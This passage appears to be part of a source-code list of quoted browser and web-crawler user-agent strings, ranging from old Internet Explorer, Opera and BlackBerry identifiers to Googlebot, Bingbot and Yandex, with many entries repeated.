'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
